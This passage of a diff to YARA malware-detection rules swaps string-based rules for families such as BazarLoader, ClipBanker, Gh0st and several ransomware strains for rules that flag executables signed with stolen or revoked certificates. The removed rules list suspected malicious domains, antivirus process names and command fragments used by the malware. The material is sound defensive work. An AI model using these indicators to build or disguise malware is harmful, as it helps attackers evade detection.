+		logic_hash = "981e4b426e926bd042f25a50de40d3e3462ed5fec0cf7261523b314b908a1276"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "21ab4357262993a042c28c1cdb52b2dab7195a6c30fa8be723631604dd330b29"
-		hash2 = "a2754d7995426b58317e437f8ed6770cd7bb7b18d971e23b2b300b75e34fa086"
-		hash3 = "b46949feeda8726c0fb86d3cd32d3f3f53f6d2e6e3fcd6f893a76b8b2632b249"
-		hash4 = "b54a67062bdcd32dfa9f3d7b69780d2e6e4925777290bc34e8f979a1b4b72ea2"
-		hash5 = "b766522dd4189fef7775d663e5649ba9d8be8e03022039d20848fcbc3643e5f2"
-		hash6 = "d3606e2e36db0a0cb1b8168423188ee66332cae24fe59d63f93f5f53ab7c3029"
-		hash7 = "857e2f63a1078d49adc59a03482f7b362563f16fb251f174bdaa7759ed47922a"
-		hash8 = "4f1b8c9209fa2684aa3777353222ad1c7716910dbb615d96ffc7882eb81dd248"
-
-	strings:
-		$ua1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" fullword wide
-		$ua2 = "Mozilla/5.0 (Android; Mobile; rv:28.0) Gecko/28.0 Firefox/28.0" fullword wide
-		$ua3 = "Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 520)" fullword wide
-		$ua4 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7)" fullword wide
-		$ua5 = "Mozilla/5.0 (IE 11.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; rv:11.0) like Gecko" fullword wide
-		$ua6 = "Mozilla/5.0 (iPad; U; CPU OS 5_1_1 like Mac OS X; en-us) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3" fullword wide
-		$ua7 = "Mozilla/5.0 (Linux; Android 4.1; Galaxy Nexus Build/JRN84D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Mobile Safari/535.19" fullword wide
-		$ua8 = "Mozilla/5.0 (Linux; Android 7.1.1; ASUS_X017DA Build/NGI77B; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/1.5.1(11790) Chrome/74.0.3729.157 Mobile Safari/537.36" fullword wide
-		$ua9 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0" fullword wide
-		$ua10 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" fullword wide
-		$ua11 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36" fullword wide
-		$ua12 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0" fullword wide
-		$n1 = "charset={[A-Za-z0-9\\-_]+}" fullword wide
-		$n2 = "Content-Length: {[0-9]+}" fullword wide
-		$n3 = "Location: {[0-9]+}" fullword wide
-		$n4 = "Set-Cookie:\\b*{.+?}\\n" fullword wide
-		$n5 = "{<html>}" fullword wide
-		$n6 = "&formid=" fullword ascii
-		$n7 = "/?id=" fullword ascii
-		$p1 = "\\milan\\Debug\\Milan.pdb" ascii
-		$p2 = "\\milan\\Release\\Milan.pdb" ascii
-		$p3 = "\\BackDor Last\\" ascii
-		$p4 = "\\BackDorLast\\" ascii
-		$s1 = "/q \"%s\" & waitfor" wide
-		$s2 = "/q \"%s\" & schtasks /delete" wide
-		$s3 = "*BOT@;" fullword ascii
-		$s4 = "mofcomp \"" fullword ascii
-		$s5 = "\"WQL\";};instance of " ascii
-		$s6 = "</svalue>" fullword wide
-		$s7 = "cmd.exe /C " wide nocase
-		$d1 = "akastatus.com" ascii
-		$d2 = "centosupdatecdn.com" ascii
-		$d3 = "checkinternet.org" ascii
-		$d4 = "cybersecnet.co.za" ascii
-		$d5 = "cybersecnet.org" ascii
-		$d6 = "defenderlive.com" ascii
-		$d7 = "defenderstatus.com" ascii
-		$d8 = "digitalmarketingagency.net" ascii
-		$d9 = "dnsanalizer.com" ascii
-		$d10 = "dnscatalog.net" ascii
-		$d11 = "dnscdn.org" ascii
-		$d12 = "dnsstatus.org" ascii
-		$d13 = "excsrvcdn.com" ascii
-		$d14 = "hpesystem.com" ascii
-		$d15 = "livednscdn.com" ascii
-		$d16 = "micrsoftonline.net" ascii
-		$d17 = "ndianmombais.com" ascii
-		$d18 = "online-analytic.com" ascii
-		$d19 = "securednsservice.net" ascii
-		$d20 = "sysadminnews.info" ascii
-		$d21 = "uctpostgraduate.com" ascii
-		$d22 = "updatecdn.net" ascii
-		$d23 = "web-traffic.info" ascii
-		$d24 = "windowsupdatecdn.com" ascii
-		$d25 = "wsuslink.com" ascii
-		$d26 = "zonestatistic.com" ascii
+		thumbprint = "d481d73bcf1e45db382d0e345f3badde6735d17d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $p* ) and ( 2 of ( $s* ) or 2 of ( $ua* ) ) ) or ( 5 of ( $n* ) and ( 2 of ( $ua* ) or 1 of ( $p* ) or 1 of ( $s* ) ) ) or ( 3 of ( $s* ) and ( 2 of ( $ua* ) or 5 of ( $n* ) ) ) or ( 2 of ( $d* ) and 6 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dbdbecdbdfafdc" and pe.signatures [ i ] . serial == "6c:8d:0c:f4:d1:59:3e:e8:dc:8d:34:be:71:e9:02:51" )
 }
-rule DITEKSHEN_MALWARE_Win_UNK05 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_7D08A74747557D6016Aaaf47A679312F : FILE
 {
 	meta:
-		description = "Detects potential BazarLoader"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "12f66315-f381-5910-b1d4-2cbf21c889a4"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "031cf958-1c37-5190-8fbd-6896f1048c9a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8469-L8486"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3334-L3345"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b3074f237fbaf449a53dcc219f48509db6af4c0d0859e6590563c3412be30aa8"
+		logic_hash = "ff7c9635b9b43bef7401861d5dbf984d1e2aa1ea9e4d3df9ad348c552767628e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "/api/get" ascii wide
-		$s2 = "PARENTCMDLINE" fullword ascii
-		$s3 = "https://microsoft.com/telemetry/update.exe" ascii wide
-		$s4 = "api.opennicproject.org" fullword ascii wide
-		$s5 = "https://%hu.%hu.%hu.%hu:%u" fullword ascii wide
-		$s6 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31" ascii wide
-		$s7 = "PARENTJOBID" fullword ascii wide
-		$s8 = "\\System32\\rundll32.exe" fullword ascii wide
-		$s9 = "{ccc38b40-5b04-4fb1-a684-07c7e448d4df}" fullword ascii wide
-		$s10 = "{065f6686-990b-46fc-829c-a53ec188a723}" fullword ascii wide
+		thumbprint = "d7fdad88c626b8e6d076f3f414bbae353f444618"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Abfacfbdcd" and pe.signatures [ i ] . serial == "7d:08:a7:47:47:55:7d:60:16:aa:af:47:a6:79:31:2f" )
 }
-rule DITEKSHEN_MALWARE_Win_Clipbanker01 : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2095C6F1Eadb65Ce02862Bd620623B92 : FILE
 {
 	meta:
-		description = "Detects ClipBanker infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b56514f4-8362-5698-8142-be836b70a11a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "c44d8942-569b-50c6-8363-0576c7d54dfb"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8488-L8521"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3347-L3358"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8ef90e22299a1009468761a4cdb8e2a92920d721f1a7ebceeb81a07e14f9156f"
+		logic_hash = "0b75d8c59486d197f2cdff298114a7367bb6ad4cf71ee28273e0946e42d3f7e8"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "Clipper" fullword wide
-		$s2 = "Ushell" fullword wide
-		$s3 = "Banker" fullword wide
-		$s4 = "ClipPurse" fullword wide nocase
-		$s5 = "SelfClip" fullword wide
-		$s6 = "Cliper" fullword wide
-		$s7 = "FHQD4313-33DE-489D-9721-6AFF69841DEA" fullword wide
-		$s8 = "Remove.bat" fullword wide
-		$s9 = "\\w{1}\\d{12}" fullword wide
-		$s10 = "SELECT * FROM Win32_ComputerSystem" fullword wide
-		$s11 = "red hat" fullword wide
-		$s12 = { 73 00 63 00 68 00 74 00 61 00 73 00 6b 00 73 00
-                 2e 00 65 00 78 00 65 00 00 ?? 2f 00 63 00 72 00
-                 65 00 61 00 74 00 65 00 20 00 2f 00 73 00 63 00
-                 20 00 00 ?? 20 00 2f 00 6d 00 6f 00 20 00 00 ??
-                 20 00 2f 00 72 00 6c 00 20 00 00 ?? 20 00 2f 00
-                 74 00 6e 00 20 00 00 ?? 20 00 2f 00 74 00 72 00
-                 20 00 00 ?? 20 00 ?? 00 ?? 00 00 ?? 2f 00 64 00
-                 65 00 6c 00 65 00 74 00 65 00 20 00 2f 00 74 00
-                 6e }
-		$s13 = "ClipChanger" fullword ascii
-		$s14 = "CheckVirtual" fullword ascii
-		$s15 = "InjReg" fullword ascii
-		$s16 = "SuicideFile" fullword ascii
-		$s17 = "HideFile" fullword ascii
-		$s18 = "AntiVm" fullword ascii
+		thumbprint = "940a4d4a5aadef70d8c14caac6f11d653e71800f"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Febeecad" and pe.signatures [ i ] . serial == "20:95:c6:f1:ea:db:65:ce:02:86:2b:d6:20:62:3b:92" )
 }
-rule DITEKSHEN_MALWARE_Win_Zombieboy : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_899E32C9Bf2B533B9275C39F8F9Ff96D : FILE
 {
 	meta:
-		description = "Detects ZombieBoy Downloader"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c1345196-1686-534c-ab4c-557113c83411"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "62ecae58-7576-5170-8eb5-2becd292e5de"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8523-L8532"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3373-L3384"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0840367c1b56c4c266f22400df95411ba7784b98919a922380e1ec789783bb65"
+		logic_hash = "c5fe3726fd19d050e762cc9e4e2099e74e3780c89a75dab55c12e16bfecd8642"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = ":\\Users\\ZombieBoy\\" ascii wide
-		$s2 = "RookIE/1.0" fullword ascii wide
+		thumbprint = "329af76d7c84a90f2117893adc255115c3c961c7"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eecaaffcbfdffaedcfec" and pe.signatures [ i ] . serial == "89:9e:32:c9:bf:2b:53:3b:92:75:c3:9f:8f:9f:f9:6d" )
 }
-rule DITEKSHEN_MALWARE_Win_Pcrat : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0B5759Bc22Ad2128B8792E8535F9161E : FILE
 {
 	meta:
-		description = "Detects PCRat / Gh0st"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "de5b3e08-16da-56e2-a0a4-d8bed5840804"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "c35c4e07-73d9-54d6-a8cb-1558502a82e9"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8534-L8561"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3386-L3397"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ad56d7d6a2bb6d09bc4530c31b51456b6bbca5def1810449fd2a31973cce18f8"
+		logic_hash = "1ee543c204e5bf004224a2010f8cfd3196bb9c1e96de350548403224eaa502f6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "ClearEventLogA" fullword ascii
-		$s2 = "NetUserAdd" fullword ascii
-		$s3 = "<H1>403 Forbidden</H1>" fullword ascii
-		$s4 = ":]%d-%d-%d  %d:%d:%d" fullword ascii
-		$s5 = "Mozilla/4.0 (compatible)" fullword ascii
-		$s6 = "<Enter>" fullword ascii
-		$s7 = "\\cmd.exe" fullword ascii
-		$s8 = "Program Files\\Internet Explorer\\IEXPLORE.EXE" fullword ascii
-		$s9 = "Collegesoft ScenicPlayer" fullword wide
-		$a1 = "360tray.exe" fullword ascii
-		$a2 = "avp.exe" fullword ascii
-		$a3 = "RavMonD.exe" fullword ascii
-		$a4 = "360sd.exe" fullword ascii
-		$a5 = "Mcshield.exe" fullword ascii
-		$a6 = "egui.exe" fullword ascii
-		$a7 = "kxetray.exe" fullword ascii
-		$a8 = "knsdtray.exe" fullword ascii
-		$a9 = "TMBMSRV.exe" fullword ascii
-		$a10 = "avcenter.exe" fullword ascii
-		$a11 = "ashDisp.exe" fullword ascii
+		thumbprint = "ddfd6a93a8d33f0797d5fdfdb9abf2b66e64350a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of ( $s* ) and 6 of ( $a* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ceeacfeacafdcdffabdbbacf" and pe.signatures [ i ] . serial == "0b:57:59:bc:22:ad:21:28:b8:79:2e:85:35:f9:16:1e" )
 }
-rule DITEKSHEN_MALWARE_Win_Rapid : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_630Cf0E612F12805Ffa00A41D1032D7C : FILE
 {
 	meta:
-		description = "Detects Rapid ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "3a23f344-8345-5ae8-aacb-f2f422d3fc9d"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "1c3e2b33-24e5-584c-b375-96c1e653a3ca"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8563-L8585"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3399-L3410"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c3f1bffeb402951da8bcccc899b2cdeb3c218b342d8338c750b9ff275537b4b5"
+		logic_hash = "2256858ae75c47568fc6a38e2a587d302d99dd396dd398a450eaa6459ed55d13"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "encblklen" fullword ascii
-		$s2 = ".rapid" fullword ascii
-		$s3 = "BgIAAACkAABSU0E" ascii
-		$s4 = "IFdlIHNlbmQ" ascii
-		$s5 = "Software\\EncryptKeys" fullword ascii
-		$s6 = "local_enc_private_key" fullword ascii
-		$s7 = "local_public_key" fullword ascii
-		$s8 = "How Recovery Files.txt" ascii
-		$s9 = "recovery.txt" ascii
-		$s10 = "thr %i run %s" fullword ascii
-		$s11 = " /TN Encrypter" ascii
-		$s12 = /Encrypter_\d+/ fullword ascii
-		$s13 = "BleepingComputer_rapid" ascii wide
-		$m1 = "tell us your unique ID - ID-" ascii
-		$m2 = "really want to restore your files?" ascii
+		thumbprint = "107af72db66ec4005ed432e4150a0b6f5a9daf2d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( 1 of ( $m* ) and 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dadebfaca" and pe.signatures [ i ] . serial == "63:0c:f0:e6:12:f1:28:05:ff:a0:0a:41:d1:03:2d:7c" )
 }
-rule DITEKSHEN_MALWARE_Win_Satana : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_603Bce30597089D068320Fc77E400D06 : FILE
 {
 	meta:
-		description = "Detects Satana ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "f3cb7cc4-3c63-50b2-8e19-d675abbb33f8"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "0f2a2411-f3d4-5959-8470-d7424d714c1d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8587-L8604"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3412-L3423"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b2946e8c37be4a57237999aaa0c0a760a181306320162e04bc6fc12a542b81d5"
+		logic_hash = "1e13c78cec21a015d9593b492ce5040f93247be63c079bfece96a3a74055aeba"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		snort_sid = "920269-920270"
-
-	strings:
-		$bf1 = "Try Decrypt: uc_size = %d, c_size = %d" ascii
-		$bf2 = "dwMailSelector = %d  dwBtcSelector = %d" ascii
-		$bf3 = "%s: Error DecB: 0x%X" ascii
-		$bf4 = "MBR written to Disk# %d" ascii
-		$bf5 = "!SATANA!" ascii wide nocase
-		$bf6 = "1 -th start" fullword ascii
-		$bf7 = "id=%d&code=%d&sdata=%d.%d.%d %d %d %s %s %d&name=%s&md5=%s&dlen=%s" ascii
-		$bf8 = "threadAdminFlood: %s %s %s" wide
-		$bf9 = "%s: NET RES FOUND: %s" wide
+		thumbprint = "4ddda7e006afb108417627f8f22a6fa416e3f264"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and 4 of ( $bf* ) ) or ( 5 of ( $bf* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fcaddefffedacfc" and pe.signatures [ i ] . serial == "60:3b:ce:30:59:70:89:d0:68:32:0f:c7:7e:40:0d:06" )
 }
-rule DITEKSHEN_MALWARE_Win_Virlock : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5D5D03Edb4Ec4E185Caa3041824Ab75C : FILE
 {
 	meta:
-		description = "Detects VirLock ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "dbf46963-3e74-54a0-8f7d-b24436c3ea2c"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "e1c93911-5c7c-5fe8-aed3-014a9bb7379e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8606-L8624"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3425-L3436"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8d516a0d771d7134c0f917f010b3973ed53b4ee7e4a2cf0bb5daecf9867b0081"
+		logic_hash = "863a1496ce37449fa7e94c407ce0e63a9d727fef9094135715d0cb14ed442e5e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "BThere are two ways to pay a fine:" fullword wide
-		$x2 = "^Es gibt zwei M" fullword wide
-		$x3 = "glichkeiten, eine Strafe zahlen." fullword wide
-		$x4 = /usertile\d+\.bmp/ fullword wide
-		$s1 = "WinSock 2.0" fullword ascii
-		$s2 = "Running" fullword ascii
-		$s3 = "echo WScript.Sleep(50)>%TEMP%/file.vbs" fullword ascii
-		$s4 = "cscript %TEMP%/file.vbs" fullword ascii
-		$s5 = "del /F /Q file.js" fullword ascii
-		$s6 = "del /F /Q %1" fullword ascii
-		$s7 = "del /F /Q %0" fullword ascii
+		thumbprint = "f6c9c564badc1bbd8a804c5e20ab1a0eff89d4c0"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( ( 2 of ( $x* ) and 2 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $x* ) ) ) ) or ( 8 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ffcdcbacfeaedbfbcecccafeb" and pe.signatures [ i ] . serial == "5d:5d:03:ed:b4:ec:4e:18:5c:aa:30:41:82:4a:b7:5c" )
 }
-rule DITEKSHEN_MALWARE_Win_Piratestealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Aec009984Fa957F3F48Fe3104Ca9Babc : FILE
 {
 	meta:
-		description = "Detects PirateStealer"
-		author = "ditekSHen"
-		id = "07278b99-b990-5016-8389-fbd27538a722"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		author = "ditekSHen"
+		id = "76b5d6b6-f443-55b5-b353-88201fe09e1f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8626-L8644"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3438-L3449"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c29fbc6cfa9e529218fa7315481e0922dc10b2da729931b8580bdd76ecdf6b68"
-		score = 50
+		logic_hash = "de9008e30468b94b4afbc622403b0257f5c5e3964344b980c18fc95219e06667"
+		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "PirateStealerBTW" wide
-		$s2 = "/PirateStealer/main/src/" wide
-		$s3 = "%WEBHOOK_LINK%" fullword wide
-		$s4 = "your_webhook_here" fullword wide
-		$s5 = "PirateMonsterInjector" ascii wide
-		$s6 = "DiscordProcesses" fullword ascii
-		$s7 = "GetDiscords" fullword ascii
-		$s8 = { 44 6f 77 6e 6c 6f 61 64 53 74 72 69 6e 67 00 47
-               65 74 46 6f 6c 64 65 72 50 61 74 68 00 57 65 62
-               68 6f 6f 6b 00 4b 69 6c 6c 00 50 72 6f 67 72 61
-               6d 00 53 79 73 74 65 6d 00 4d 61 69 6e 00 }
+		thumbprint = "9d5b6bc86775395992a25d21d696d05d634a89d1"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ceefaccdedbfbbaaaadacdbf" and pe.signatures [ i ] . serial == "ae:c0:09:98:4f:a9:57:f3:f4:8f:e3:10:4c:a9:ba:bc" )
 }
-rule DITEKSHEN_MALWARE_Win_Nglite : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_283518F1940A11Caf187646D8063D61D : FILE
 {
 	meta:
-		description = "Detects NGLite"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b014ed4f-57b1-597e-befc-6e7f80855201"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "cf5f7f11-3af6-577b-9a5e-eafe2de34e2b"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8646-L8668"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3451-L3462"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d83663908949f69018461c73cf7137cf4ab16cc057cfe47942e6de0415ab5447"
+		logic_hash = "7db16bc44059e2538eb896011598a599c6aead90fb873c530ce8f5391e440164"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "/lprey/main.go" ascii
-		$x2 = "/NGLiteV1.01/lprey/" ascii
-		$x3 = "/ng.com/lprey/" ascii
-		$x4 = "/mnt/hgfs/CrossC2-2.2/src/" ascii
-		$x5 = "WHATswrongwithUu" ascii
-		$s1 = "main.Preylistener" fullword ascii
-		$s2 = "main.Runcommand" fullword ascii
-		$s3 = "main.RandomPass" fullword ascii
-		$s4 = "main.AesEncode" fullword ascii
-		$s5 = "main.RsaEncode" fullword ascii
-		$s6 = "main.AesDecode" fullword ascii
-		$s7 = "main.initonce" fullword ascii
-		$s8 = "main.SendOnce" fullword ascii
-		$s9 = "main.clientConf" fullword ascii
-		$s10 = "main.Sender" fullword ascii
+		thumbprint = "aaeb19203b71e26c857613a5a2ba298c79910f5d"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 6 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eeeeeeba" and pe.signatures [ i ] . serial == "28:35:18:f1:94:0a:11:ca:f1:87:64:6d:80:63:d6:1d" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Kdcsponge : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_72F3E4707B94D0Eef214384De9B36E : FILE
 {
 	meta:
-		description = "Detects KdcSponge"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8832a141-a85d-5604-992e-7e9bd892d410"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "bf02ea89-b3f3-58a1-8bcd-1a23b3c96b68"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8670-L8700"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3464-L3475"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c891db94df9cde9eaa6096ad68d96c7b85a9c03e255ce43ccb8543a016bd3853"
+		logic_hash = "c2a310ff70012076856239b5b5e6b46ffa121479dea38815e61f5336cecf8868"
 		score = 75
-		quality = 65
+		quality = 75
 		tags = "FILE"
-		hash1 = "e391c2d3e8e4860e061f69b894cf2b1ba578a3e91de610410e7e9fa87c07304c"
-
-	strings:
